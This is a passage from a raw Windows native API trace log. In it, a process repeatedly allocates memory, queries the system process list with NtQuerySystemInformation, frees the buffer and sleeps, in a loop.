RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.237] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.253] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.269] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.283] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.301] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.317] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.330] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.348] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.362] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.377] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.393] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.410] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.424] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.456] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.470] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.487] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.505] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.518] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.535] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.549] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.565] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 